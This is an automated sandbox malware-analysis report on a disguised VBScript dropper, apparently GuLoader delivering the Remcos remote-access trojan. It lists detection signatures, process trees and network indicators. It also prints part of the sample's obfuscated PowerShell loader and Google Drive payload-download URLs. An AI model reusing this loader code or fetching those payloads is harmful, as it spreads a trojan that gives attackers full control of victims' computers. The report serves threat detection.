
Windows Analysis Report
Document BT24#U00b7pdf.vbs

Overview

General Information

Sample name: Document BT24#U00b7pdf.vbs
renamed because original name is a hash value
Original sample name: Document BT24pdf.vbs
Analysis ID: 1634191
MD5: ad3e6aca2d3c7bdc121064d393074f8b
SHA1: 8dca38f1576b98c17435bc1dd37ebf62108e77a8
SHA256: 7bec21f0990dfc51766f7b7932aa1535aa0414e33abc021834158151ad15ed9d
Tags: RAT, RemcosRAT, vbs, user-abuse_ch

Detection

Remcos, GuLoader
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Detected Remcos RAT
Early bird code injection technique detected
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
Found suspicious powershell code related to unpacking or dynamic code loading
Joe Sandbox ML detected suspicious sample
Potential evasive VBS script found (sleep loop)
Queues an APC in another process (thread injection)
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 6420 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Document BT24#U00b7pdf.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • PING.EXE (PID: 5300 cmdline: ping Host_6637.6637.6637.657e MD5: 2F46799D79D22AC72C241EC0322B011D)
      • conhost.exe (PID: 2656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7624 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [obfuscated PowerShell script argument] MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 2112 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" [obfuscated PowerShell script argument] MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 2212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 4752 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • msiexec.exe (PID: 6172 cmdline: "C:\Windows\System32\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
Source: 0000000C.00000002.2222859365.00000000075BD000.00000004.00000020.00020000.00000000.sdmp, Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Author: Joe Security
Source: 00000003.00000002.1582725505.0000026D10302000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Author: Joe Security
Source: 00000008.00000002.2006537244.0000000008750000.00000040.00001000.00020000.00000000.sdmp, Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Author: Joe Security
Source: 00000008.00000002.1971298491.0000000005A9B000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Author: Joe Security
Source: 00000008.00000002.2006894025.000000000B775000.00000040.00001000.00020000.00000000.sdmp, Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Author: Joe Security

              Source: amsi64_7624.amsi.csv, Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Author: Joe Security
              Source: amsi64_7624.amsi.csv, Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC, Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution, Author: ditekSHen, Strings:
              • 0xfe95:$b2: ::FromBase64String(
              • 0xd1cc:$s1: -join
              • 0x6978:$s4: +=
              • 0x6a3a:$s4: +=
              • 0xac61:$s4: +=
              • 0xcd7e:$s4: +=
              • 0xd068:$s4: +=
              • 0xd1ae:$s4: +=
              • 0xf56f:$s4: +=
              • 0xf5ef:$s4: +=
              • 0xf6b5:$s4: +=
              • 0xf735:$s4: +=
              • 0xf90b:$s4: +=
              • 0xf98f:$s4: +=
              • 0xd9f8:$e4: Get-WmiObject
              • 0xdbe7:$e4: Get-Process
              • 0xdc3f:$e4: Start-Process
              Source: amsi32_2112.amsi.csv, Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC, Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution, Author: ditekSHen, Strings:
              • 0xa9fc:$b2: ::FromBase64String(
              • 0x9a64:$s1: -join
              • 0x3210:$s4: +=
              • 0x32d2:$s4: +=
              • 0x74f9:$s4: +=
              • 0x9616:$s4: +=
              • 0x9900:$s4: +=
              • 0x9a46:$s4: +=
              • 0x13a8a:$s4: +=
              • 0x13b0a:$s4: +=
              • 0x13bd0:$s4: +=
              • 0x13c50:$s4: +=
              • 0x13e26:$s4: +=
              • 0x13eaa:$s4: +=
              • 0xa290:$e4: Get-WmiObject
              • 0xa47f:$e4: Get-Process
              • 0xa4d7:$e4: Start-Process
              • 0x14712:$e4: Get-Process

              System Summary

              Source: Process started, Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Document BT24#U00b7pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Document BT24#U00b7pdf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Document BT24#U00b7pdf.vbs", ProcessId: 6420, ProcessName: wscript.exe
              Source: Network Connection, Author: frack113: Data: DestinationIp: 142.250.181.238, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 4752, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49716
              Source: Process started, Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Document BT24#U00b7pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Document BT24#U00b7pdf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Document BT24#U00b7pdf.vbs", ProcessId: 6420, ProcessName: wscript.exe
              Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [obfuscated PowerShell script argument]
              Timestamp: 2025-03-10T20:37:50.473361+0100, SID: 2803305, Severity: 3, Classtype: Unknown Traffic, Source IP: 192.168.2.5, Source Port: 49708, Destination IP: 142.250.181.238, Destination Port: 443, Protocol: TCP
              Timestamp: 2025-03-10T20:38:58.946806+0100, SID: 2803270, Severity: 2, Classtype: Potentially Bad Traffic, Source IP: 192.168.2.5, Source Port: 49716, Destination IP: 142.250.181.238, Destination Port: 443, Protocol: TCP

              AV Detection

              Source: Document BT24#U00b7pdf.vbs, Virustotal: Detection: 14%
              Source: Document BT24#U00b7pdf.vbs, ReversingLabs: Detection: 18%
              Source: Yara match, File source: 0000000C.00000002.2222859365.00000000075BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: Process Memory Space: msiexec.exe PID: 4752, type: MEMORYSTR
              Source: Submitted Sample, Integrated Neural Analysis Model: Matched 97.4% probability
              Source: unknown, HTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.5:49707 version: TLS 1.2
              Source: unknown, HTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.5:49708 version: TLS 1.2
              Source: unknown, HTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.5:49709 version: TLS 1.2
              Source: unknown, HTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.5:49716 version: TLS 1.2
              Source: unknown, HTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.5:49717 version: TLS 1.2

              Software Vulnerabilities

              Source: C:\Windows\System32\wscript.exe, Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

              Networking

              Source: C:\Windows\System32\wscript.exe, Process created: C:\Windows\System32\PING.EXE ping Host_6637.6637.6637.657e
              Source: global traffic, HTTP traffic detected: GET /uc?export=download&id=12OP5AsIYXeKON8azV9Dts0sJhjUxJTsm HTTP/1.1 Host: drive.google.com
              Source: global traffic, HTTP traffic detected: GET /download?id=12OP5AsIYXeKON8azV9Dts0sJhjUxJTsm&export=download HTTP/1.1 Host: drive.usercontent.google.com Connection: Keep-Alive
              Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: Network traffic, Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49708 -> 142.250.181.238:443
              Source: Network traffic, Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49716 -> 142.250.181.238:443
              Source: global traffic, HTTP traffic detected: GET /uc?export=download&id=12OP5AsIYXeKON8azV9Dts0sJhjUxJTsm HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0 Host: drive.google.com Connection: Keep-Alive
              Source: global traffic, HTTP traffic detected: GET /uc?export=download&id=1xJUHcOwTYLF4CpOb43j4CAGUq-W1-b4b HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0 Host: drive.google.com Cache-Control: no-cache
              Source: global traffic, HTTP traffic detected: GET /download?id=1xJUHcOwTYLF4CpOb43j4CAGUq-W1-b4b&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
              Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global traffic, DNS traffic detected: DNS query: Host_6637.6637.6637.657e
              Source: global traffic, DNS traffic detected: DNS query: drive.google.com
              Source: global traffic, DNS traffic detected: DNS query: drive.usercontent.google.com
              Source: powershell.exe, 00000003.00000002.1536459249.0000026D00001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000008.00000002.1952137250.0000000004A21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 00000003.00000002.1536459249.0000026D005A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1536459249.0000026D00580000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1536459249.0000026D005A2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2178021460.00000000075EC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2222859365.00000000075E7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2113833968.000000000762B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2113645596.00000000075EF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2113645596.00000000075E0000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2177947972.00000000075E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
              Source: powershell.exe, 00000003.00000002.1582725505.0000026D10079000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000003.00000002.1582725505.0000026D10079000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000003.00000002.1582725505.0000026D10079000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000003.00000002.1536459249.0000026D005BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1536459249.0000026D00495000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1536459249.0000026D0057B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
              Source: msiexec.exe, 0000000C.00000002.2222859365.000000000757A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
              Source: msiexec.exe, 0000000C.00000002.2222859365.000000000757A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/q
              Source: powershell.exe, 00000003.00000002.1536459249.0000026D00227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=12OP5AsIYXeKON8azV9Dts0sJhjUxJTsmP
              Source: powershell.exe, 00000008.00000002.1952137250.0000000004B78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=12OP5AsIYXeKON8azV9Dts0sJhjUxJTsmXRMl
              Source: msiexec.exe, 0000000C.00000002.2237358289.0000000022770000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2222859365.000000000757A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1xJUHcOwTYLF4CpOb43j4CAGUq-W1-b4b
              Source: msiexec.exe, 0000000C.00000002.2222859365.000000000757A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1xJUHcOwTYLF4CpOb43j4CAGUq-W1-b4b3
              Source: msiexec.exe, 0000000C.00000002.2222859365.000000000757A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1xJUHcOwTYLF4CpOb43j4CAGUq-W1-b4bR
              Source: msiexec.exe, 0000000C.00000002.2222859365.000000000757A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1xJUHcOwTYLF4CpOb43j4CAGUq-W1-b4bz
              Source: powershell.exe, 00000003.00000002.1536459249.0000026D005A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
              Source: powershell.exe, 00000003.00000002.1536459249.0000026D00BBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com(
              Source: msiexec.exe, 0000000C.00000003.2178021460.00000000075EC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2222859365.00000000075E7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2177947972.00000000075E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/%
              Source: powershell.exe, 00000003.00000002.1536459249.0000026D005A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1536459249.0000026D005BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1536459249.0000026D00BBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1536459249.0000026D0059E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=12OP5AsIYXeKON8azV9Dts0sJhjUxJTsm&export=download
              Source: msiexec.exe, 0000000C.00000003.2177947972.00000000075E7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2222859365.00000000075D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1xJUHcOwTYLF4CpOb43j4CAGUq-W1-b4b&export=download
              Source: msiexec.exe, 0000000C.00000003.2178021460.00000000075EC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2222859365.00000000075E7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2177947972.00000000075E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/z
              Source: powershell.exe, 00000003.00000002.1536459249.0000026D00227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000003.00000002.1590762513.0000026D744A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.co
              Source: powershell.exe, 00000003.00000002.1582725505.0000026D10079000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000003.00000002.1536459249.0000026D005A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1536459249.0000026D00580000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1536459249.0000026D005A2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2178021460.00000000075EC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2222859365.00000000075E7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2113833968.000000000762B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2113645596.00000000075EF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2113645596.00000000075E0000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2177947972.00000000075E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
              Source: powershell.exe, 00000003.00000002.1536459249.0000026D005A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1536459249.0000026D00580000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1536459249.0000026D005A2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2178021460.00000000075EC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2222859365.00000000075E7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2113833968.000000000762B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2113645596.00000000075EF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2113645596.00000000075E0000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2177947972.00000000075E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
              Source: powershell.exe, 00000003.00000002.1536459249.0000026D005A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1536459249.0000026D00580000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1536459249.0000026D005A2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2178021460.00000000075EC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2222859365.00000000075E7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2113833968.000000000762B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2113645596.00000000075EF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2113645596.00000000075E0000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2177947972.00000000075E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: powershell.exe, 00000003.00000002.1536459249.0000026D005A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1536459249.0000026D00580000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1536459249.0000026D005A2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2178021460.00000000075EC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2222859365.00000000075E7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2113833968.000000000762B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2113645596.00000000075EF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2113645596.00000000075E0000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2177947972.00000000075E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
              Source: powershell.exe, 00000003.00000002.1536459249.0000026D005A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1536459249.0000026D00580000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1536459249.0000026D005A2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2178021460.00000000075EC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2222859365.00000000075E7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2113833968.000000000762B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2113645596.00000000075EF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2113645596.00000000075E0000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2177947972.00000000075E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
              Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
              Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49717
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716
              Source: unknown Network traffic detected: HTTP traffic on port 49717 -> 443
              Source: unknown HTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.5:49707 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.5:49708 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.5:49709 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.5:49716 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.5:49717 version: TLS 1.2

              E-Banking Fraud

              Source: Yara match File source: 0000000C.00000002.2222859365.00000000075BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: Process Memory Space: msiexec.exe PID: 4752, type: MEMORYSTR

              System Summary

              Source: amsi64_7624.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: amsi32_2112.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7624, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 2112, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Document BT24#U00b7pdf.vbs Static file information: Suspicious name
              Source: C:\Windows\System32\wscript.exe COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
              Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $elselskaber;function Xanthorrhiza($Diagnostikkernes){ .($Optimalvaerdi) ($Diagnostikkernes)} function raspite($Ambivalentes){$smaabarnsalderen=4;do{$Summker+=$Ambivalentes[$smaabarnsalderen];$smaabarnsalderen+=5;$Skaberaktapirer=Format-List} until(!$Ambivalentes[$smaabarnsalderen])$Summker}$Spaltedefinitionen=raspite ' ndnHjlpeM thtThra.Lesiw';$Spaltedefinitionen+=raspite 'MasteB,reb Di CTeralSl gIAssieBeh,N irT';$Choremen=raspite 'ro fM ForoSa,izGagsiMpanlUnc lAnt aDeme/';$Polytungstate=raspite 'SaniTGogolStifs Agu1 Afs2';$Hematohidrosis='Inve[No.nNSlutE Rabt K l.AnthSUnexE,essrQuinVMilliTolacMillEStraPTridO PeriContNOpsuT UdvMOm,iA s lNOrgaa B,rgBeg,eStemrKa,e]F,rf:Duch:H.poS HijePh,ecUdfruSnekRProtiIncoT.arayBuckpFlotrSky oVoltTKo goFor cTriao ortlWar =taag$StatP puno griLNeu YEmpeTGoo UOec NSmregTills ShatSv daOvertPrope';$Choremen+=raspite 'Rets5Lede.De i0 enc Doe(AttaW AngiCompn ynkdOp roV.trwFangs Spr S.riNDioxTfaca Misa1T ta0Cruc.Dile0Hjem;Genl UnpeWVulgiNedknRadi6Tilb4Bybu;Sp l K igx nap6Graf4Mu t; Ndt FrorMontvSkib:T mm1Past3 Den4 trl.Unmo0Fal )A la ForsG KnaeMigrcOophkGer,oFjl./Ar.e2Unr 0 V n1Zair0Peri0Skab1benz0Phys1Ran PleFClasi mstrFlaweSeksfuopdo allxPala/du,n1 .nt3Hjul4Rall.Gibb0';$Gyldigheder=raspite 'FormuSociSPo aEKibbRInst-Hr,eANobigExtrEFordnBi eT';$Reaccepted=raspite 'OpdrhPaaktUordt E,cp ActsPort:B,ro/Vldi/ la,dUdsor C.ciUdvivIntae Sid.Car g dskoRag o Th gFeeblP eseUdpa.Outwc emeoSnnemB se/Omn,u ankc Unq?muskeSignx I,rp ormoa rer Bo tK rn=.dspdHensot,ylw DatnSavnlPolyoKonta.occdPree& BigiNajad Gru=B rn1 For2VedlO AmaPIndf5Sho.AS ymsLodnIBathYSdceXTemae.abrKUndeOHairNTes 8 SniaAga z,fveVvend9U peDOlivtM ttsOv r0DomfsUndlJtranh SpijHypnUBo lxOrthJTappTLrlisterrm';$Genette=raspite 'Loph>';$Optimalvaerdi=raspite 'ForuI D 
